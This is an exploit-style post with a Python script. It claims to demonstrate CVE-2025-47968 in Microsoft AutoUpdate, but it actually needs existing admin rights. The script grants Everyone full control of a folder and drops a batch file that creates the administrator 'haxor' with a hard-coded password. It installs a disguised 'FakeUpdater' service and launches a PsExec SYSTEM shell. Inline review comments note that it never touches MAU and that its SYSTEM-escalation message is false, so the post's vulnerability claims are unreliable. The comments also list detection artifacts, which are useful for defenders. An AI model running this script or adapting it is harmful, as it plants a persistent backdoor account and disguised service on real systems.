# Title: CVE-2025-47968-Core-Logic Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability
# Author: nu11secur1ty
# Date: 07/03/2025
# Vendor: https://www.microsoft.com/en-us
# Software: https://www.microsoft.com/en-us/d/windows-11-pro/dg7gmgf0d8h4
# Reference: https://portswigger.net/web-security/access-control

## Description:
This Python script simulates the core logic of CVE-2025-47968 on Windows systems. It demonstrates privilege escalation by:
- Creating a new user `haxor` with administrative privileges.
- Using NSSM (Non-Sucking Service Manager) to install and run a malicious service.
- Leveraging scheduled tasks to escalate the user to SYSTEM-level privileges.
- Launching a SYSTEM-level command shell using PsExec.

## Prerequisites
- Windows system with administrative rights.
- `nssm.exe` placed at `C:\nssm\nssm.exe`.
- `psexec.exe` placed in the same directory as the Python script.
- Python 3 installed.

## How It Works
1. Checks whether the script is run with administrator privileges.
2. Creates the directory `C:\Updater` and sets full permissions on it.
3. Drops a batch file that adds the user `haxor` and adds it to the administrators group.
4. Uses NSSM to install a service that runs this batch file.
5. Starts the service to create the user.
6. Uses a scheduled task to add the user to the administrators group as SYSTEM.
7. Creates a scheduled task to open a SYSTEM shell via PowerShell.
8. Runs PsExec to open an interactive SYSTEM command prompt.

## Usage
Run the script as administrator:
```powershell
python simulate_cve_2025_47968.py
```
Expected output:
```
[+] Created folder: C:\Updater
[+] Running: icacls "C:\Updater" /grant Everyone:(OI)(CI)F /T
processed file: C:\Updater
processed file: C:\Updater\update.bat
Successfully processed 2 files; Failed processing 0 files
[+] Dropped malicious batch file at: C:\Updater\update.bat
[+] Running: "C:\nssm\nssm.exe" stop FakeUpdater
FakeUpdater: STOP: The operation completed successfully.
[+] Running: "C:\nssm\nssm.exe" remove FakeUpdater confirm
Service "FakeUpdater" removed successfully!
[+] Running: "C:\nssm\nssm.exe" install FakeUpdater cmd.exe /c "C:\Updater\update.bat"
Service "FakeUpdater" installed successfully!
[+] Running: sc stop FakeUpdater
[SC] ControlService FAILED 1062:
The service has not been started.
[*] Service not running or already stopped, continuing...
[+] Running: sc start FakeUpdater
SERVICE_NAME: FakeUpdater
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1436
FLAGS :
[*] Waiting 5 seconds for the batch to finish executing...
[+] Success! User 'haxor' was created and added to administrators.
[*] Attempting to escalate user to SYSTEM privileges...
[+] Running: schtasks /Create /TN EscalateToSystem /TR "net localgroup administrators haxor /add" /SC ONCE /ST 00:00 /RL HIGHEST /F /RU SYSTEM
WARNING: Task may not run because /ST is earlier than current time.
SUCCESS: The scheduled task "EscalateToSystem" has successfully been created.
[+] Running: schtasks /Run /TN EscalateToSystem
SUCCESS: Attempted to run the scheduled task "EscalateToSystem".
[+] Running: schtasks /Delete /TN EscalateToSystem /F
SUCCESS: The scheduled task "EscalateToSystem" was successfully deleted.
[+] Escalation task executed. 'haxor' should now have SYSTEM-level admin rights.
[*] Attempting to open SYSTEM shell with psexec...
[+] Running: "C:\Users\pwnedpc\Desktop\CVE-2025-47968\psexec.exe" -s -i cmd.exe
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com
```

## Important Notes
- The script requires `nssm.exe` and `psexec.exe` in the specified locations.
- The SYSTEM shell may not always appear as a visible window due to system policies.
- Use responsibly and only on systems you have permission to test.
## Disclaimer This code is for educational purposes only. Unauthorized use may violate laws and policies.
# Reproduce: - Video: [href](https://www.youtube.com/watch?v=h64Rs45yuN4) - GitHub: [href]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47968)
# Donate, if you are not ashamed! [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
# Time spent: 03:15:00 Proof of Concept:
#!/usr/bin/python
# Python PoC – CVE-2025-47968 Core Logic (Windows Simulation)
# nu11secur1ty 2025
#
# NOTE(review): main() exits unless the process is already elevated, so every
# step below runs with administrator rights and the script itself crosses no
# trust boundary. Nothing in the code references Microsoft AutoUpdate (MAU);
# the world-writable folder, the service and the user are all created by the
# script rather than found on the host.
# Artifacts left behind after a run (relevant for IR / detection engineering):
# local user "haxor", the "FakeUpdater" service, the world-writable C:\Updater
# folder and the plaintext update.bat inside it. The "EscalateToSystem" task is
# deleted again, but its creation and deletion are still logged.

import os
import subprocess
import ctypes
import sys
import time


def is_admin():
    """Return True when the current process token is elevated.

    Calls shell32.IsUserAnAdmin(); any failure (non-Windows host, missing
    ctypes.windll) is swallowed by the bare except and reported as False.
    """
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False


def run(cmd):
    """Echo *cmd* and execute it through the shell.

    Uses shell=True on a string assembled with f-strings. Every caller in
    this file passes hard-coded values, so there is no injection surface as
    written, but the pattern would become one if any piece were ever taken
    from external input. check=True turns a non-zero exit status into
    subprocess.CalledProcessError, which some callers catch.
    """
    print(f"[+] Running: {cmd}")
    subprocess.run(cmd, shell=True, check=True)


def check_user_exists(username):
    """Return True unless ``net user <username>`` reports the account as missing.

    The check is a substring match on an English error message; on a
    non-English locale the text differs, so a missing user would be reported
    as present — TODO confirm on a localised system. Any exception is
    swallowed and reported as False.
    """
    try:
        result = subprocess.run(f'net user {username}', shell=True, capture_output=True, text=True)
        return "The user name could not be found" not in result.stdout
    except:
        return False


def check_user_in_admins(username):
    """Return True when *username* appears, case-insensitively, in the output
    of ``net localgroup administrators``.

    Plain substring match, so any member whose name merely contains
    *username* also counts. Any exception is swallowed and reported as False.
    """
    try:
        result = subprocess.run('net localgroup administrators', shell=True, capture_output=True, text=True)
        return username.lower() in result.stdout.lower()
    except:
        return False


def escalate_to_system(username):
    """Add *username* to Administrators through a one-shot scheduled task run as SYSTEM.

    Creates the task, triggers it immediately, then deletes it. The command it
    runs is the same ``net localgroup administrators ... /add`` that update.bat
    already executed via the service, so after a successful service run this
    step is redundant; group membership does not depend on which account
    performed the add, and it does not give the user SYSTEM privileges.
    Task creation, execution and deletion are recorded in the Task Scheduler
    operational log and, with task auditing enabled, as Security events
    4698 (created) and 4699 (deleted).
    """
    task_name = "EscalateToSystem"
    cmd = f'net localgroup administrators {username} /add'
    create_task_cmd = (
        f'schtasks /Create /TN {task_name} /TR "{cmd}" /SC ONCE /ST 00:00 /RL HIGHEST /F /RU SYSTEM'
    )
    run(create_task_cmd)
    run(f'schtasks /Run /TN {task_name}')
    run(f'schtasks /Delete /TN {task_name} /F')


def open_system_shell_with_psexec():
    """Launch an interactive cmd.exe as SYSTEM with PsExec (``-s -i``).

    psexec.exe is expected next to this script; when it is absent an error is
    printed and the function returns without raising. PsExec installs its
    PSEXESVC service on the host to do this, which is a well-known detection
    point.
    """
    # psexec.exe is in the same directory as this script
    script_dir = os.path.dirname(os.path.abspath(__file__))
    psexec_path = os.path.join(script_dir, "psexec.exe")
    if not os.path.isfile(psexec_path):
        print(f"[!] ERROR: psexec.exe not found at {psexec_path}. Download from https://learn.microsoft.com/en-us/sysinternals/downloads/psexec")
        return
    cmd = f'"{psexec_path}" -s -i cmd.exe'
    run(cmd)


def main():
    """Drive the simulation end to end; every step runs with the caller's
    existing administrator rights.

    Sequence: elevation check -> locate nssm.exe -> create the Updater folder
    and grant Everyone full control -> drop update.bat (adds user "haxor" with
    a hard-coded plaintext password and puts it in Administrators) -> install
    and start the "FakeUpdater" service that runs the batch -> verify the user
    -> scheduled-task step -> PsExec SYSTEM shell.

    Nothing created here is cleaned up afterwards: the folder, the batch file
    (password included), the service and the user all remain on the host.
    Exits with status 1 when not elevated or when nssm.exe is missing.
    """
    if not is_admin():
        print("[!] Please run this script as Administrator.")
        sys.exit(1)
    nssm_path = r"C:\nssm\nssm.exe"
    if not os.path.isfile(nssm_path):
        print(f"[!] ERROR: nssm.exe not found at {nssm_path}")
        print("Download nssm from https://nssm.cc/download and place nssm.exe at this path.")
        sys.exit(1)
    # The "vulnerable" location is created by the script itself: a fresh folder
    # granted Everyone:(OI)(CI)F, i.e. world-writable, inherited by its contents.
    vuln_path = r"C:\Updater"
    os.makedirs(vuln_path, exist_ok=True)
    print(f"[+] Created folder: {vuln_path}")
    run(f'icacls "{vuln_path}" /grant Everyone:(OI)(CI)F /T')
    # Payload the service will execute; the password is written to disk in
    # plaintext and the file is never removed.
    batch_path = os.path.join(vuln_path, "update.bat")
    with open(batch_path, "w") as f:
        f.write("@echo off\n")
        f.write("net user haxor Passw0rd123 /add\n")
        f.write("net localgroup administrators haxor /add\n")
    print(f"[+] Dropped malicious batch file at: {batch_path}")
    service_name = "FakeUpdater"
    username = "haxor"
    # stop/remove only clear a service left over from a previous run; a
    # CalledProcessError here just means there was nothing to clean up.
    try:
        run(f'"{nssm_path}" stop {service_name}')
    except subprocess.CalledProcessError:
        print("[*] Service not running or cannot stop (may not exist), continuing...")
    try:
        run(f'"{nssm_path}" remove {service_name} confirm')
    except subprocess.CalledProcessError:
        print("[*] Service may not exist yet, continuing...")
    # Service installation (System log event 7045) running cmd.exe /c <batch>.
    # No service account is specified, so nssm's default applies; the service
    # is left installed afterwards.
    run(f'"{nssm_path}" install {service_name} cmd.exe /c "{batch_path}"')
    try:
        run(f'sc stop {service_name}')
    except subprocess.CalledProcessError:
        print("[*] Service not running or already stopped, continuing...")
    run(f'sc start {service_name}')
    # Fixed delay rather than polling: if the batch takes longer than 5 s the
    # checks below report failure even though the user may still be created.
    print("[*] Waiting 5 seconds for the batch to finish executing...")
    time.sleep(5)
    # The batch's account creation and group change surface as Security
    # events 4720 (user created) and 4732 (member added to a local group).
    user_exists = check_user_exists(username)
    user_admin = check_user_in_admins(username)
    if user_exists and user_admin:
        print(f"[+] Success! User '{username}' was created and added to administrators.")
        print("[*] Attempting to escalate user to SYSTEM privileges...")
        escalate_to_system(username)
        # The task re-runs the same group add; the user is an administrator,
        # not SYSTEM, after this — the message below overstates the result.
        print("[+] Escalation task executed. 'haxor' should now have SYSTEM-level admin rights.")
        print("[*] Attempting to open SYSTEM shell with psexec...")
        open_system_shell_with_psexec()
    elif user_exists:
        print(f"[!] User '{username}' was created but is NOT in administrators group.")
    else:
        print(f"[!] User '{username}' was NOT created. Something went wrong.")


if __name__ == "__main__":
    main()